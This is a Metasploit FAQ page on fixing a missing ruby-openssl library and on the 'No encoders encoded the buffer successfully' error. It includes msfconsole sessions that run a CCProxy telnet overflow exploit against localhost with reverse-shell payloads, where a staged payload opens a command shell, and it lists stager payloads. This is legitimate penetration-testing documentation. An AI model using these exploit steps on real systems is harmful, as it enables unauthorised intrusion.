Metasploit/Frequently Asked Questions
Installation
[edit | edit source]Errors
[edit | edit source]no such file to load -- openssl (LoadError)
[edit | edit source]Q: When running Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)
- Example:
[~/metasploit]# ./msfgui ./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError) from ./lib/rex/socket/ssl_tcp_server.rb:4 from ./lib/rex/socket/comm/local.rb:5:in `require' from ./lib/rex/socket/comm/local.rb:5 from ./lib/rex/socket.rb:22:in `require' from ./lib/rex/socket.rb:22 from ./lib/rex.rb:71:in `require' from ./lib/rex.rb:71 from ./msfgui:10:in `require' from ./msfgui:10
A: Metasploit requires the Ruby implementation of openssl - not the standard C implementation of openssl used by Apache etc. Install the relevant ruby-openssl library.
- Example (for Debian - check your OS or try using gem):
pwebster@metasploit:~$ apt-cache search ruby | grep openssl libopenssl-ruby - OpenSSL interface for Ruby libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9 pwebster@metasploit:~# apt-get install libopenssl-ruby
Exploit Modules
[edit | edit source]Errors
[edit | edit source]Exploit failed: No encoders encoded the buffer successfully
[edit | edit source]Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.
- Example:
msf > use windows/proxy/ccproxy_telnet_ping msf exploit(ccproxy_telnet_ping) > info Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow Version: $Revision$ Platform: Windows Privileged: No License: Metasploit Framework License Provided by: Patrick Webster <patrick [at] aushack.com> Available targets: Id Name -- ---- 0 Windows 2000 Pro SP0 - English 1 Windows 2000 Pro SP1 - English 2 Windows 2000 Pro SP2 - English 3 Windows 2000 Pro SP3 - English 4 Windows 2000 Pro SP4 - English 5 Windows XP SP0/1 - English 6 Windows 2003 Server SP0/1 - English Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 127.0.0.1 yes The target address RPORT 23 yes The target port Payload information: Space: 200 Avoid: 5 characters Description: This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command. msf exploit(ccproxy_telnet_ping) > set TARGET 4 TARGET => 4 msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit(ccproxy_telnet_ping) > check [*] The target appears to be vulnerable. msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully.
A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is: 'Space: 200'. However, the target application does not allow certain characters to be used (usually the null character 0x00 as this denotes the end of a string [character array]). In the example the payload cannot permit five characters: 'Avoid: 5 characters '
When you run the exploit, the payload generators will attempt to fit your desired payload into a space of 200 which excludes 5 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully.
However, all is not lost. The Metasploit Framework includes the ability to support staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as reverse shell), will start a staging platform which can then add to that platform. So in our example, instead of a complete reverse shell, it will:
- Create the staging platform.
- Allocate enough memory to hold your desired payload.
- Obtain the rest of the payload from you.
- Execute the payload as a whole.
Generally, all the staged exploits are denoted by the '/' after the desired payload. Some examples are:
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager windows/exec/find_tag Windows Execute Command, Find Tag Ordinal Stager windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
So now that we know it cannot fit an 'Inline' payload, we can use a stager instead:
... msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23... [*] Sending stage (474 bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Documents and Settings\Administrator>